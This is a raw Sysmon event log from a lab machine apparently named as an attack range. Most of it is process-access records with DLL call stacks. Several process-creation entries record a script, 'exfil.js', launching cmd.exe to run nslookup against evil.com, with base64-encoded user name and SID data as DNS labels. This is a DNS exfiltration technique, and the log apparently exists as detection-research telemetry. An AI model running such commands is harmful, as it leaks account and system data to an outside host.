14:21:50.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3B46-000000005F02}3972C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-18FE-629A-3946-000000005F02}74645704C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-3B46-000000005F02}3972C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-18FE-629A-3B46-000000005F02}3972C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-3946-000000005F02}7464C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfi.tmp 2>&1 10341000x8000000000000000215263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.306{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3A46-000000005F02}2900C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.306{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3A46-000000005F02}2900C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.301{2E1864BB-18FE-629A-3A46-000000005F02}29008016C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3946-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.284{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3A46-000000005F02}2900C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3946-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-18E0-629A-6742-000000005F02}39767192C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-3946-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.277{2E1864BB-18FE-629A-3946-000000005F02}7464C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.269{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhoeb.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-18FE-629A-3746-000000005F02}50402620C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3846-000000005F02}660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3846-000000005F02}660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.222{2E1864BB-18FE-629A-3646-000000005F02}37327620C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-3846-000000005F02}660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.227{2E1864BB-18FE-629A-3846-000000005F02}660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-3646-000000005F02}3732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhoeb.tmp 2>&1 10341000x8000000000000000215243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.203{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3746-000000005F02}5040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.202{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3746-000000005F02}5040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.184{2E1864BB-18FE-629A-3746-000000005F02}50402620C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3646-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3746-000000005F02}5040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\